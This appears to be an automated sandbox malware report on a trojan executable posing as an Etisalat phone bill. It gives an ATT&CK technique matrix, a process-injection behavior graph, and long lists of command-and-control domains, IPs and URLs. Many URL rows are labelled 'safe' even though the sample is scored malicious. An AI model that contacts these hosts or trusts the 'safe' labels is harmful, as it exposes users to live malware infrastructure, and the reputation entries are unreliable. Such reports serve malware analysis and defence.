          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS115
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		2
          Valid Accounts          		LSA Secrets151
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Virtualization/Sandbox Evasion          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448570 Sample: Details of Your Etisalat Su... Startdate: 28/05/2024 Architecture: WINDOWS Score: 100 34 www.vietcadao.com 2->34 36 www.usedata.monster 2->36 38 11 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 11 Details of Your Etisalat Summary Bill for the Month of May 2024.exe 4 2->11         started        signatures3 process4 signatures5 56 Binary is likely a compiled AutoIt script file 11->56 58 Writes to foreign memory regions 11->58 60 Maps a DLL or memory area into another process 11->60 14 svchost.exe 11->14         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 2 other signatures 14->68 17 explorer.exe 75 1 14->17 injected process8 dnsIp9 28 www.myconc.pro 169.239.128.46, 49714, 80 ZAPPIE-HOST-ASZappieHostGB Seychelles 17->28 30 www.vietcadao.com 103.224.212.212, 49710, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->30 32 3 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Details of Your Etisalat Summary Bill for the Month of May 2024.exe37%ReversingLabsWin32.Trojan.Strab
          Details of Your Etisalat Summary Bill for the Month of May 2024.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://word.office.comon0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          https://wns.windows.com/)s0%URL Reputationsafe
          https://outlook.com0%URL Reputationsafe
          http://www.flickzbiz.fun/da29/0%Avira URL Cloudsafe
          http://www.1wxir.com0%Avira URL Cloudsafe
          http://www.vietcadao.comReferer:0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://www.sercettopper.comReferer:0%Avira URL Cloudsafe
          https://api.msn.com/0%URL Reputationsafe
          http://www.1wxir.com/da29/0%Avira URL Cloudsafe
          http://www.kas-travel.com/da29/www.mediatechnologysolutions.com0%Avira URL Cloudsafe
          http://crl.v0%URL Reputationsafe
          http://www.aerotyneholdings.com/da29/0%Avira URL Cloudsafe
          http://www.kas-travel.com0%Avira URL Cloudsafe
          www.1wxir.com/da29/0%Avira URL Cloudsafe
          http://www.1wxir.com/da29/www.rlyadventures.com0%Avira URL Cloudsafe
          http://www.usedata.monster/da29/0%Avira URL Cloudsafe
          http://www.myconc.pro/da29/0%Avira URL Cloudsafe
          http://www.rlyadventures.com/da29/0%Avira URL Cloudsafe
          http://www.openshiftstore.comReferer:0%Avira URL Cloudsafe
          http://www.953700958.com/da29/www.iransarafan.com0%Avira URL Cloudsafe
          http://www.cucinaconestilo.comReferer:0%Avira URL Cloudsafe
          http://www.vietcadao.com/da29/0%Avira URL Cloudsafe
          http://www.usedata.monster0%Avira URL Cloudsafe
          http://www.vietcadao.com0%Avira URL Cloudsafe
          http://www.cucinaconestilo.com/da29/0%Avira URL Cloudsafe
          http://www.vietcadao.com/da29/www.micheleditrana.com0%Avira URL Cloudsafe
          http://www.openshiftstore.com/da29/0%Avira URL Cloudsafe
          http://www.myconc.pro0%Avira URL Cloudsafe
          http://www.mediatechnologysolutions.com/da29/0%Avira URL Cloudsafe
          http://www.micheleditrana.com/da29/0%Avira URL Cloudsafe
          http://www.iransarafan.comReferer:0%Avira URL Cloudsafe
          http://www.veriosg.xyz/da29/www.sercettopper.com0%Avira URL Cloudsafe
          http://www.sercettopper.com/da29/0%Avira URL Cloudsafe
          http://www.953700958.com/da29/0%Avira URL Cloudsafe
          http://www.micheleditrana.com/da29/www.aerotyneholdings.com0%Avira URL Cloudsafe
          http://www.flickzbiz.funReferer:0%Avira URL Cloudsafe
          http://www.usedata.monster/da29/www.vietcadao.com0%Avira URL Cloudsafe
          http://www.kas-travel.comReferer:0%Avira URL Cloudsafe
          http://www.aerotyneholdings.com/da29/www.1wxir.com0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.mediatechnologysolutions.com0%Avira URL Cloudsafe
          http://www.myconc.pro/da29/www.flickzbiz.fun0%Avira URL Cloudsafe
          http://www.veriosg.xyz/da29/0%Avira URL Cloudsafe
          http://www.flickzbiz.fun/da29/www.openshiftstore.com0%Avira URL Cloudsafe
          http://www.micheleditrana.com0%Avira URL Cloudsafe
          http://www.rlyadventures.com0%Avira URL Cloudsafe
          http://www.cucinaconestilo.com/da29/e0%Avira URL Cloudsafe
          http://www.usedata.monsterReferer:0%Avira URL Cloudsafe
          http://www.mediatechnologysolutions.comReferer:0%Avira URL Cloudsafe
          http://www.1wxir.comReferer:0%Avira URL Cloudsafe
          http://www.iransarafan.com0%Avira URL Cloudsafe
          http://www.flickzbiz.fun0%Avira URL Cloudsafe
          http://www.rlyadventures.com/da29/www.myconc.pro0%Avira URL Cloudsafe
          http://www.953700958.comReferer:0%Avira URL Cloudsafe
          http://www.myconc.proReferer:0%Avira URL Cloudsafe
          http://www.mediatechnologysolutions.com/da29/www.953700958.com0%Avira URL Cloudsafe
          http://www.aerotyneholdings.comReferer:0%Avira URL Cloudsafe
          http://www.veriosg.xyz0%Avira URL Cloudsafe
          http://www.kas-travel.com/da29/0%Avira URL Cloudsafe
          http://www.rlyadventures.comReferer:0%Avira URL Cloudsafe
          http://www.iransarafan.com/da29/www.cucinaconestilo.com0%Avira URL Cloudsafe
          http://www.953700958.com0%Avira URL Cloudsafe
          http://www.sercettopper.com/da29/www.kas-travel.com0%Avira URL Cloudsafe
          http://www.iransarafan.com/da29/0%Avira URL Cloudsafe
          http://www.openshiftstore.com/da29/www.veriosg.xyz0%Avira URL Cloudsafe
          http://www.sercettopper.com0%Avira URL Cloudsafe
          http://www.veriosg.xyzReferer:0%Avira URL Cloudsafe
          http://www.micheleditrana.comReferer:0%Avira URL Cloudsafe
          http://www.aerotyneholdings.com0%Avira URL Cloudsafe
          http://www.cucinaconestilo.com0%Avira URL Cloudsafe
          http://www.openshiftstore.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.1wxir.com
          		190.115.24.78
          		truetrue
            		unknown
            openshiftstore.com
            		45.137.159.230
            		truetrue
              		unknown
              www.myconc.pro
              		169.239.128.46
              		truetrue
                		unknown
                www.aerotyneholdings.com
                		13.248.169.48
                		truetrue
                  		unknown
                  micheleditrana.com
                  		76.223.105.230
                  		truetrue
                    		unknown
                    www.kas-travel.com
                    		155.248.232.116
                    		truetrue
                      		unknown
                      www.vietcadao.com
                      		103.224.212.212
                      		truetrue
                        		unknown
                        www.flickzbiz.fun
                        		unknown
                        		unknowntrue
                          		unknown
                          www.usedata.monster
                          		unknown
                          		unknowntrue
                            		unknown
                            www.rlyadventures.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.micheleditrana.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.openshiftstore.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.sercettopper.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    www.1wxir.com/da29/true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://word.office.comonexplorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.vietcadao.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aerotyneholdings.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kas-travel.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1wxir.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1wxir.com/da29/www.rlyadventures.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.flickzbiz.fun/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1wxir.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sercettopper.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.4441907247.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1996092451.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.kas-travel.com/da29/www.mediatechnologysolutions.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.usedata.monster/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cucinaconestilo.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.myconc.pro/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rlyadventures.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.vietcadao.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://excel.office.comexplorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.953700958.com/da29/www.iransarafan.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.usedata.monsterexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.vietcadao.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.microexplorer.exe, 00000003.00000002.4439072490.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439468324.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439499553.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.openshiftstore.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cucinaconestilo.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.vietcadao.com/da29/www.micheleditrana.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mediatechnologysolutions.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.micheleditrana.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.openshiftstore.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.myconc.proexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.iransarafan.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.953700958.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.veriosg.xyz/da29/www.sercettopper.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.flickzbiz.funReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.micheleditrana.com/da29/www.aerotyneholdings.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sercettopper.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1996092451.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4441907247.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.usedata.monster/da29/www.vietcadao.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kas-travel.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mediatechnologysolutions.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wns.windows.com/)sexplorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.3096473322.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096473322.000000000C861000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.veriosg.xyz/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.flickzbiz.fun/da29/www.openshiftstore.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.myconc.pro/da29/www.flickzbiz.funexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aerotyneholdings.com/da29/www.1wxir.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.micheleditrana.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rlyadventures.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cucinaconestilo.com/da29/eexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.usedata.monsterReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.iransarafan.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1wxir.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.flickzbiz.funexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mediatechnologysolutions.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rlyadventures.com/da29/www.myconc.proexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.953700958.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aerotyneholdings.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://outlook.comexplorer.exe, 00000003.00000002.4440413157.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.mediatechnologysolutions.com/da29/www.953700958.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.myconc.proReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.veriosg.xyzexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kas-travel.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.iransarafan.com/da29/www.cucinaconestilo.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.953700958.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rlyadventures.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1987574509.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.iransarafan.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
